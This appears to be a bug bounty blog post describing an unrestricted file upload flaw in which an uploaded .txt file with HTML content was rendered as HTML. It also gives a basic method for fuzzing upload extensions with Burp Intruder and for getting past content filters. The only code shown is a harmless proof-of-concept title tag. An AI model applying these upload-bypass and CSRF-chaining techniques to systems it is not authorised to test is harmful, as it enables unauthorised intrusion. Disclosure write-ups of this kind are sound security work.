Basically, the break through is pretty simple. We need to upload the txt file with HTML contents and the tmp.txt will act as a HTML file. That's how we can exploit further.

I was testing the file upload functionality, I tried many extensions and bypass but failed! There was a feature for uploading .txt file and the server allows it. 

Why the TXT file acts as a HTML file?

  • Is this happening because of the contents inside the .txt file?

This could be.

  • Is this happening because of .htaccess?

Maybe

After exploiting this .txt file as .html, now I always test for this vulnerability. To be honest, I got 2 more after this term.

What was inside the .txt file?


 <title>PoC by @eternyle</title> <h1>PoC by @eternyle</h1>

PoC?


After that, I tried for PHP. Unfortunately, there was a strong WAF that I was not able to bypass the filter to execute the php file. I saw I can use JavaScripts code too but limited. 

After that, I tried to load an API endpoints inside an <Iframe> tag, but unfortunately, there was no sensitive endpoint where I can load the JSON data, so I can exploit them in a different way to steal those data. :)

All I can do is, take advantages of HTML and make a CSRF exploit to make the report more juicy!

After reporting the issue I was awarded 200 USD and the vulnerability has been fixed.


Thoughts

How I always test for unrestricted file upload vulnerability? (Basic only)

First thing first, I go for simple extensions.

If it not works, I try to upload with other extensions. Basically, I send the UPLOAD request to BURP SUITE "intruder" and add few common extensions in the payload option and run the INTRUDER attack. If I am lucky enough, I may get something.

What is inside the file that your'e uploading?

Here comes about the file contents! Do you think before upload the file? What is really inside the file? For HTML, what you have provided inside the file?

I followed many times that server isn't allowing me if the file contains any malicious title, tag or a piece of code. So, at a first glance of the file upload testing, I start from the very basic.

For example, If I am trying to upload a HTML or PHP file, I do not try to add any code. Instead of code, I add a normal text to make sure I am able to bypass the extension first. Because If I am able to get the extension works, I can go further.


See you in next article till then stay tuned. Thank you very much for reading.